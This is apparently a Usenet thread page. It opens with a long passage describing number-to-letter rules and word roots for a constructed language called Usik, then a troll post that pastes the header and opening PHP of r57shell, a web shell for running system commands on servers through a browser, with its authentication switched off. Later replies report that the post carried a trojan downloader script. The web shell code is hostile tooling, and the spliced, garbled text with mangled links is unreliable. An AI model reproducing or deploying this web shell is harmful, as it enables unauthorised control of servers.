All these numbers (the Tens)always remain invariable.Or what is the
same,that they always have the value which is noted down and will be
read and written the way it is indicated in column C.

As we can see column C is the same as A but without consonants.
Therefore,if we leave the consonants out of column B,the TENS are
left.

COLUMN D

The first thing we see is that they contain the same consonants as
column A to which the letter I is added,equivalent to two zeros.

This column corresponds to the HUNDREDS

Later,100 is written and read BI
200=SI
300=DI
And so on.

The I is always lost when the HUNDREDS are combined (column E),except
in the following THREE CASES

1.-The I remains in all combinations of THREE NUMBERS,when the one in
the MIDDLE is a ZERO.

2.-It also remains in all the combinations of three numbers when the
first two are the SAME and the last one a ZERO

3.-And it will ALWAYS remain,in combinations of three numbers when the
last two are ZEROS

In all the other combinations of three numbers which are not included
in the mentioned characteristics,the numbers of column D,lose their
vowel,that is the “I”

Let us more carefully study these THREE CASES,noted down and in which
the I remains
With clear examples

Let us form number 102

This combination includes all the characteristics noted down in Case
1,that is to say,it is formed by three numbers and the one in the
MIDDLE is a ZERO.Later the I of the hundred will be remained when we
pronounced and write mentioned unit

102=BIS

The BI of the HUNDRED and the S of the 2(S and not SE because the 2 is
not on its own,but is part of the unit)and thus still having the value
of 2(SE)it loses the vowel.

103=BID
104=BIF
Etc…

CASE 2

Formation of 110

As we see this number includes all the conditions mentioned for case
2,that is to say,it has TWO EQUAL NUMBERS at the beginning and ends in
a ZERO
Thus the I of the HUNDRED will be remained

110=BIA

Therefore,220=SIE,440=SIO,etc…

Point Three has no problem at all,since all the HUNDREDS(when they are
not combined)include all the requirements,that is to say,one number
accompanied by two zeros.The reading of the numbers of this case
corresponds to the one of column D.

As we have said in All the combinations which do not include the
requirements of the mentioned cases,the HUNDREDS lose the “I”
And will become part of the value given in column E

Let us have a look at the combination 342,for instance.
We see that there is no ZERO in the middle(Case 1)
The first 2 numbers are not the same and does not end in zero,either
(case 2)
The combinations does not end in TWO ZEROS,either,so then we will
automatically know that the value THRE HUNDRED is going to lose its I

342=DOS

That is to say,the D of the THREE HUNDRED(COMBINED),the 0 of the FORTY
(INVARIABLE) and the S of the Two(COMBINED)

In the same manner 950=TU

Others examples:
122=BES
332=DAIS(has thee first two numbers the same but does not end in a
zero)
264=SEUF
329=DET
920=TE
932=TAIS
And so on

Now let´s get on with the studying the equivalence of the ZEROS

1.-When a number BEGINS combination with two three or mor zeros,will
conserve the corresponding vowel(column B) since in this case
mentioned NUMBER is consideered ISOLATED

Exmple:The equivalent letter to three ZEROS is the N,so that in order
to form the number 1000(we see that 1 begins the combination and which
has three zeros)we shall take the value of the 1,which we know is BA
and we shall add to it the letter corresponding to the three zeros
which is the N,resulting in

BAN=1000

1002=BANS(That is first the equivalence of 1000 and the 2)

When the first and second number begin THOUSAND do that in a
combination in which mentioned numbers are not followed by a ZERO,they
will always lose the N.
They also lose although the second number of the two that begin the
thousand is a zero

Example:50342=UDOS
The N is not neccesary and besides the number cannot be confused,given
that the value U is always 50 and DOS=342
We see that before 342 are the tens(and we know that these are
invariables)

Nevertheless when the number that begins thousands is a SINGLE
ONE,followed by a ZERO,it will be mandatory that it has the N

1030=BANAI

When there are no ZEROS the simple values are simply substituted

42.429=OSFET

26.000=EKN
122.000=BESN
20.042=ENOS

When in a number formed by SIX NUMBERS the 3rd and the 4th are
zeros,it will also contain the N

130.020=BAINE

For the letter J,equivalent to millions,the same rules are valid as
for the N

1.000.000=BAJ

900.000.000=TIJ

920.000.030=TEJAI

(Such large numbers like the mentioned one,of course,are not included
in the formation of words,only being useful in numerical sense)
We already said that when are no zeros in a number,the different
numbers are substituted by its numerical value.

Exemple

542.759=GOSLUT
926.842.950=TEKMOSTU

Now,let us see the following combination.

900.000.000.000=TINJ

Broke down:
900=TI
000=N
000.000=J

FORMATION OF THE ROOTS

Once the numerical system of Usik was obtained which allows us to read
the numbers with the equivalence NUMBER-LETTER,our first assignament
was to select the mono-syllabical.
After obtaining them,the most possible universal meaning had to be
applied,which would mean the consultation of a great deal of languages
in search of the common element.

On the other hand,the roots of Usik are intrinsically typical of its
own and original but a profound base.

The so-called minority languages have not been ruled out at
all,either.

Languages which have been consulted,many of which have similar roots
to Usik or identical ones are among many others):

Albanian
Anglosaxon
Arabic
Aragonese
Arcadian
Armenian
Asturian
Basque
Breton
Bulgarian
Byzantine
Celtic
Chech
Chinese
Cornish
Danish
Dutch
Egyptian
English
Esperanto
Etruscan
Euskera
Frankish
French
Fries
Gaelic
Galician
Gascon
German
Germanic
Gothic
Greck
Hebrian
Hindian
Hindu
Hispanic
Huescan
Hungarian
Hungarian
Iberian
Icelandic
Interlingua
Ionic
Irish
Japanese
Javanese
Latin
Latvian
Leonese
Lithuanian
Lombard
Louvainese
Mayan-quiché
Medieval
Nordic
Norwegian
Persian
Phoenician
Polish
Portuguese
Preroman
Primitive
Provençal
Prussian
Punic
Quechua
Ruinic
Samaritan
Sanskrit
Scandinavian
Scottish
Serbian
Slavonic
slovak
Slovene
Spanish
Swedish
Tocarian
Tourainese
Valencian

After extensive research and once the numerical key was found,we went
on by seeing how the words have been formed.Of course,this supposed a
previous knowledge of different languages

On Oct 25, 5:13 pm, Anonymous Number of People


<marty.musa...@gmail.com> wrote:
<html> this is a script th@ routes data @ fromhttp://any.anythrough

iuuq://meami.org --->http://meami.org--->http://any.

/* r57shell.php - скрипт на пхп позволяющий вам выполнять системные
команды на сервере через браузер
/* Вы можете скачать новую версию на нашем сайте:http://meami.org>
http:///rst.void.ru
/* Версия: 1.31
/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
/* Отдельная благодарность за помощь и идеи: blf, phoenix, virus,
NorD и всем чертям из RST/GHC.
/* Если у Вас есть какие-либо идеи по поводу того какие функции
следует добавить в скрипт то пишите
/* на marty.musa...@gmail.com > r...@void.ru. Все предложения будут
рассмотрены.
/



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
/* (c)oded by http://< iuuq://meami.org >> 1dt.w0lf

/* RST/GHChttp://meami.org>http:///rst.void.ru , http:///ghc.ru


/* ANY MODIFIED REPUBLISHING IS PERMITTED
/

****************************************************************************************************/
/* ~~~ Настройки | Options ~~~ */

// Выбор языка | Language
// $language='ru' - русский (russian)
// $language='eng' - english (английский)
$language='eng';

// Аутентификация | Authentification
// $auth = 1; - Аутентификация включена ( authentification = OFF )
// $auth = 0; - Аутентификация выключена ( authentification = ON )
$auth = 0;

// Логин и пароль для доступа к скрипту (Login & Password for access)
// НЕ ЗАБУДЬТЕ СМЕНИТЬ ПЕРЕД РАЗМЕЩЕНИЕМ НА СЕРВЕРЕ!!! (YOU MAY
CHANGE
THIS!!!)
// Логин и пароль шифруются с помощью алгоритма md5, значения по
умолчанию 'r57'


// Login & password crypted with md5, default is 'r57'

$name='ec371748dc2da624b35a4f8f685dd122'; // логин пользователя
(user
login)
$pass='ec371748dc2da624b35a4f8f685dd122'; // пароль пользователя
(user
password)
/



****************************************************************************************************/
error_reporting(0);
set_magic_quotes_runtime(0);
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
$safe_mode = @ini_get('safe_mode');
$version = '1.31';
if(version_compare(phpversion(), '4.1.0') == -1)
{
$_POST = &$HTTP_POST_VARS;
$_GET = &$HTTP_GET_VARS;
$_SERVER = &$HTTP_SERVER_VARS;
$_COOKIE = &$HTTP_COOKIE_VARS;
}
if (@get_magic_quotes_gpc())
{
foreach ($_POST as $k=>$v)
{
$_POST[$k] = stripslashes($v);
}
foreach ($_COOKIE as $k=>$v)
{
$_COOKIE[$k] = stripslashes($v);
}
}

if($auth == 1) {
if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER
['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
{
header('WWW-Authenticate: Basic realm="r57shell"');
header('HTTP/1.0 401 Authorized');

exit("<b><a href=http://MEAMI.ORG/http:///rst.void.ru>r57shell</a>
: Access Permitted</b>");
}}

$head = '<!-- Здравствуй, Вася -->

Chris F.A. Johnson

unread,
Oct 25, 2009, 10:10:44 PM10/25/09
to
On 2009-10-26, Anonymous Number of People wrote:
> submit {
>> BORDER: ??buttonhighlight 2px outset;

[1,500 lines of rubbish snipped]

<PLONK!>

--
Chris F.A. Johnson <http://cfaj.freeshell.org>
===================================================================
Author:
Shell Scripting Recipes: A Problem-Solution Approach (2005, Apress)

Dave Searles

unread,
Oct 25, 2009, 10:32:17 PM10/25/09
to
Chris F.A. Johnson wrote:
> On 2009-10-26, Anonymous Number of People wrote:
>> submit {
>>> BORDER: ??buttonhighlight 2px outset;
>
> [1,500 lines of rubbish snipped]

VIRUS-INFECTED rubbish. The HTML preamble on his first post links to a
trojan, which my copy of Avast! dutifully warned about (even though I
display HTML posts as plain text so the evil script in it won't run anyway).

I didn't think our resident troll would stoop THAT low; color me surprised.

[Jongware]

unread,
Oct 26, 2009, 10:24:35 AM10/26/09
to

Do you mean the hidden analytics/ga.js link? Quite a nasty surprise,
yes. It's said to be just a visitor counter, and

"[t]hey do appear to be a legit hosting co., with seemingly dubious
tactics."

-- but color me dubious.

[Jw]

Dave Searles

unread,
Oct 27, 2009, 1:50:03 PM10/27/09
to
[Jongware] wrote:
> Dave Searles wrote:
>> Chris F.A. Johnson wrote:
>>> On 2009-10-26, Anonymous Number of People wrote:
>>>> submit {
>>>>> BORDER: ??buttonhighlight 2px outset;
>>>
>>> [1,500 lines of rubbish snipped]
>>
>> VIRUS-INFECTED rubbish. The HTML preamble on his first post links to a
>> trojan, which my copy of Avast! dutifully warned about (even though I
>> display HTML posts as plain text so the evil script in it won't run
>> anyway).
>>
>> I didn't think our resident troll would stoop THAT low; color me
>> surprised.
>
> Do you mean the hidden analytics/ga.js link? Quite a nasty surprise,
> yes.

There's script tags in the first post. The second one, where Musatov
replies to himself, doesn't trigger Avast!

Avast! says the first post contains code for JS:TrojDnldr-16 [Trj].

0 new messages